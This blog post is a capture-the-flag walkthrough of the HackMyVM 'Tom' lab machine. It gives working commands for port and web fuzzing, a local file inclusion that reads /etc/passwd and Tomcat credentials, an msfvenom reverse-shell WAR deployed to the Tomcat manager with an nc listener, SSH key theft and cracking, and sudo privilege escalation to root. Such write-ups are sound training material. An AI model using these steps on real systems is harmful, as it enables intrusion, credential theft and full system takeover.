Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Tom Walkthrough

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: tomcat configuration and upload

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                       
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        


Enum port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log 
 ===============================================================
 /index.html           (Status: 200) [Size: 10701]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
 /tomcat.php           (Status: 200) [Size: 0]              


Fuzz tomcat.php.

 ~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"          


Get /etc/passwd.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd'       
 root:x:0:0:root:/root:/bin/bash
 ...
 nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
 ...
 tomcat:x:1001:1001::/opt/tomcat:/bin/false


We need to get home dir of tomcat.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'                    fish-0 | 0 [10:29:59]
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target
 
 [Service]
 Type=forking
 
 User=tomcat
 Group=tomcat
 
 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"
 
 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"
 
 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh
 
 [Install]
 WantedBy=multi-user.target


Check password file at tomcat HOME dir.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml' 
 ...
 <role rolename="admin-gui"/>
 <role rolename="manager-script"/>
 <user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
 </tomcat-users>


Generate reverse shell for tomcat and upload.

 ~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war       
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war
 
 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]


Get reverse shell.

 ~ curl 'http://192.168.56.100:8080/upload/rev.war'                  
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234                                                                                       fish-0 | 0 [10:48:06]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:52234.
 id    
 uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)


Check sudo -l.

 tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85


Read id_rsa of user nathan.

 sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
 <~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...


Decode ascii85 online, then get id_rsa.

 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45
 
 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...


Decrypt id_rsa.

 ~ /usr/share/john/ssh2john.py id_rsa  > hash
 ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash                                               bash-0 | 1 [11:08:11]
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 darkness         (id_rsa)
 1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
 Session aborted


Login ssh as usr nathan, check sudo -l.

 ~ ssh nathan@192.168.56.100 -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp


Get root.

 nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan#



发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1